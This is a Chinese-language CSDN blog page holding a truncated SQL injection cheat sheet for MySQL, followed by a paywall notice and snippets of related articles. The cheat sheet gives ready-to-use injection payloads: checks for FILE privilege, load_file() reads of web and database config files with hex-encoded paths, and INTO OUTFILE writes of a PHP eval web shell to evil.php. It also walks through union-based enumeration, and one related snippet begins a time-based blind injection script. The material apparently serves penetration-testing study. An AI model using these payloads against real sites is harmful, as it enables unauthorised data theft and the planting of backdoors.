mysql dba盲注_SQL注入速查笔记

最新推荐文章于 2023-07-10 17:05:02 发布
最新推荐文章于 2023-07-10 17:05:02 发布
阅读量475 收藏
点赞数
文章标签: mysql dba盲注
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32026659/article/details/113426247
版权

SQL 注入分类方式:

提交方式:GET POST COOKIE

参数注入:数字型/字符型/搜索型

数据库类型:ACCESS/Mysql/MSSQL/Oracle

手工注入方法:联合查询、报错注入、盲注(基于布尔型、基于时间延迟)

0x01、Mysql

Mysql划分:权限 root 普通用户 版本 mysql>5.0 mysql<5.0

1.1 root权限

load_file和into outfile用户必须有FILE权限,并且还需要知道网站的绝对路径

判断是否具有读写权限

and (select count(*) from mysql.user)>0#

and (select count(file_priv) from mysql.user)>#

A、Load_file() 该函数用来读取源文件的函数,只能读取绝对路径的网页文件

注意:路径符号”\”错误 “\”正确 “/”正确,转换成十六进制,不用“”

id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,load_file(’/var/www/index.php’)(物理路径转16进制)

可以用来读取数据库连接文件获取数据连接账号、密码等

?id=1'and 1=2 union select 1,load_file('D:\\wamp\\www\\111.php')%23

?id=1'and 1=2 union select 1,load_file(0x443A2F77616D702F7777772F312E706870)%23

B、into outfile函数

条件:1. 绝对路径 2.可以使用单引号

?id=1 union select 1,"<?php @eval($_POST['g']);?>",3 into outfile 'E:/study/WWW/evil.php'

?id=1 LIMIT 0,1 INTO OUTFILE 'E:/study/WWW/evil.php' lines terminated by 0x20273c3f70687020406576616c28245f504f53545b2767275d293b3f3e27 --

1.2 MySQL联合查询

1.2.1 适用于mysql低于5.0版本

1.判断是否可以注入?id=1 and 1=1,页面正常?id=1 and 1=2,页面空白2.获得字段数

order by的方法来判断,比如:?id=1 order by 4页面显示正常?id=1 order by 5页面出错,说明字段数等于43.获得显示位?id=1 and 1=2 union select 1,2,3,4

//比如,页面上出现了几个数字,分别是2,3,4,那么,这几个数字就被我们称作显示位。

4.猜表名

猜表名的方法是,在第三步的完整的地址后加上:Form 表名,比如:?id=1 and 1=2 union select 1,2,3,4 fromusers

这样,当users表存在的话,页面就会显示正常,如果我们提交一个不存在的表名,页面就会出错。5.猜字段

使用:Co

最低0.47元/天 解锁文章
亦梦如是
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL注入速查笔记
10-22 4万+
SQL 注入分类方式: 提交方式:GET POST COOKIE 参数注入:数字型/字符型/搜索型 数据库类型:ACCESS/Mysql/MSSQL/Oracle 手工注入方法:联合查询、报错注入盲注(基于布尔型、基于时间延迟) 0x01、Mysql Mysql划分:权限 root 普通用户 版本 mysql>5.0 mysql<5.0 1.1 root权限 lo...
mysql DBA学习笔记
08-17
这份"超经典mysql DBA学习笔记"涵盖了成为一名优秀DBA所需掌握的众多知识点,旨在帮助学习者深入理解MySQL数据库的运维与优化。 一、MySQL概述 MySQL是一种开源、免费的关系型数据库管理系统,广泛应用于互联网应用...
sql注入-延时注入】sleep()、benchmark()函数 延时注入
最新发布
07-10 7228
【延时注入】结合if、case when 延时注入
SQL注入技术
qq_25981849的博客
02-14 393
SQL注入技术 漏洞成因 SQL注入漏洞的原因是由于程序员没有严格过滤用户输入,导致用户输入语句与数据库语句拼接成了一个新的合法语句所产生的漏洞。 SQL注入应用技术 SQL注入可以用来读取文件、写入文件、执行系统命令。 SQL注入的不同类型和常用函数 有回显的注入 有回显的漏洞直接走一遍标准流程就行了 报错注入 有的时候页面会显示sql报错,在这种情况下,我们可以通过人为的报错将不可见的信息转换在错误信息显示出来。 updatexml报错注入 uname=Dumb&passwd=0' or upd
【渗透测试】浅谈SQL注入
网络安全从业者的学习笔记
03-11 954
关于SQL注入攻击的一些知识点
mysql benchmark 注入_sql注入------基于时间延迟benchmark函数注入脚本
weixin_39915505的博客
01-19 1330
#author:windy_2importrequestsurlx= 'http://127.0.0.1/?id= 1 and if((substr((select database()),'payloads= 'qwertyuiopasdfghjklzxcvbnm{}_0123456789'defguess_column(table):string= ''extend=0list=[]lengt...
超经典MySQL DBA培训笔记
07-17
这份“超经典MySQL DBA培训笔记”显然涵盖了MySQL数据库管理的各个方面,是DBA或者对MySQL有兴趣的学习者的重要参考资料。接下来,我将根据这个主题,详细解释MySQL DBA需要掌握的关键知识点。 1. **MySQL基础知识*...
超经典mysql dba 学习笔记
08-11
本学习笔记聚焦于MySQL这一广泛使用的开源关系型数据库管理系统,为有志成为DBA或者希望提升MySQL技能的读者提供了丰富的知识资源。以下是笔记中可能涵盖的主要知识点: 1. **MySQL简介**:MySQL的历史、特性、版本...
大神写的MySQL DBA学习笔记
09-09
这份“大神写的MySQL DBA学习笔记”无疑是深入理解和掌握MySQL技术的重要资源,尤其适合那些希望提升自己在数据库管理领域技能的人。笔记内容可能涵盖了从基础概念到高级实践的全方位知识,包括但不限于以下关键点:...
超经典mysql dba 学习笔记.zip
10-19
这份“超经典mysql dba学习笔记”包含了丰富的MySQL运维知识,对于想要深入理解和掌握MySQL DBA技能的人来说是一份宝贵的资料。 一、MySQL基础知识 在学习MySQL DBA之前,首先需要了解MySQL的基本概念,包括数据库...
BenchmarkSQL高性能测试
weixin_53596073的博客
03-21 5663
在官网的blog文章中,详细介绍了如何tpcc测试、安装benchmarksql和安装数据库,请先阅读它:BenchmarkSQL性能测试。 本次openGauss数据库部署采用TaiShan 200服务器(型号2280) : CPU型号: 鲲鹏920 6426, 2P 128核 内存数量: 32G * 24条 网络:10GE带宽 网卡:1822 SP580 25GE 硬盘:nvme* 3个 容量:7.3T (HWE52P438T0L005N) 软件:
mysql benchmark 注入_MySQL注入(一)之常用函数和information_schema
weixin_28867333的博客
01-27 234
MySQL注入(一)之常用函数和information_schemaMySQL注入 information_schema0x00 常用函数DATABASE() 返回当前数据库名CONNECTION_ID() 返回当前客户的连接IDUSER()或SYSTEM_USER() 用户名CURRENT_USRE() 当前登陆用户名SESSION_USER() 连接数据库的用户名FOUND_ROWS(...
BenchmarkSQL简介及使用
热门推荐
fuqiangnxn的博客
08-07 1万+
BenchmarkSQL简介及使用 一、介绍: BenchmarkSQL是对OLTP数据库主流测试标准TPC-C的开源实现。目前最新版本为V5.0,该版本支持Firebird,Oracle和PostgreSQL数据库,测试结果详细信息存储在CSV文件中,并可以将结果转换为HTML报告。 二、项目地址: 下载地址:https://sourceforge.net/projects/ben...
SQL注入原理-手工注入access数据库
WQ_762的博客
08-06 610
SQL注入原理-手工注入access数据库 【实验原理】 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 首先,在以【.asp?id=32(数字任意)】结尾的链接依次添加语句【’】、【and 1=1】和【and1=2】,来判断网站是否存在注入点。 然后,添加语句【and exists(select * fr...
【性能测试】benchmarksql工具7*24稳定性测试
test_dog的博客
01-29 3483
本文主要介绍使用benchmark工具对数据库进行7*24小时稳定性测试。
SQL注入笔记(二)
CC__LL__CC的博客
03-22 4412
注入点 一、SELECT注入 1.注入点在select_expr 源码:$res=mysqli_query($conn,"SELECT ${_GET['id']},content ROM wp_news"); 既可以采取时间盲注进行数据获取,也可以用AS别名的方法,将查询的结果直接显示到界面,访问?id=(select%20pwd%20from%20wp_user)%20as%20title 注意:若注入点有反引号包裹,应先闭合。 2.注入点在table_reference SQL语句:$res=mysql
基于BenchmarkSQL的达梦数据库TPCC性能测试
Sebastien23的博客
04-18 1674
中的用户和密码在达梦数据库中创建测试用户,并保证其表空间足够容纳生成的测试数据。如果开启了归档,还要考虑归档日志占用的空间。BenchmarkSQL默认不支持达梦数据库。这里我们让BenchmarkSQL把达梦数据库当作Oracle即可。Oracle数据库对应的测试配置文件为。是使用BenchmarkSQL进行性能测试的主要配置文件。是生成的测试报告,png文件是报告中包含的图片。拷贝达梦数据库驱动到BenchmarkSQL的。测试结束后,会在当前路径下生成一个以。规则命名的结果目录。
Benchmarksql 使用
justforid的博客
04-21 3033
目的及原理 TPC-C是在线事务处理(OLTP)的基准程序,用于衡量数据库系统OLTP性能的指标。 TPC-C测试用到的模型是一个大型的商品批发销售公司,它拥有若干个分布在不同区域的商品仓库。每个仓库负责为10个销售点供货,其中每个销售点为3000个客户提供服务,每个客户提交的订单中,平均每个订单有10项产品(5-15件),所有订单中约1%的产品在其直接所属的仓库中没有存货,必须由其他区域的仓库来供货。同时,每个仓库都要维护公司销售的100000种商品的库存记录。 TPC-C最大的有效.
SQL注入——猜测字段名称
weixin_30337251的博客
07-13 358
之前两篇文章所说的SQL注入手段均是在服务器层面是root权限,而现实的渗透测试过程中,很多都是无权读取information_schema库,并且很多拒绝联合访问Union和order by语句。遇到这些问题时候,就需要我们去爆破猜测一些数据库字开发逻辑,对一些列,表,内容进行猜测 猜测某个列 猜测abc这个列是否存在,网页提示: 说明我们所...
MySQL DBA运维笔记:多实例安装与安全管理
本文档是一份详尽的MySQL DBA运维笔记,主要针对数据库管理和维护工作展开。首先,章节1.1对数据库类型进行了概述,区分了关系型数据库和非关系型数据库,分别介绍了它们的基本概念和常见产品,如MySQL作为关系型...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值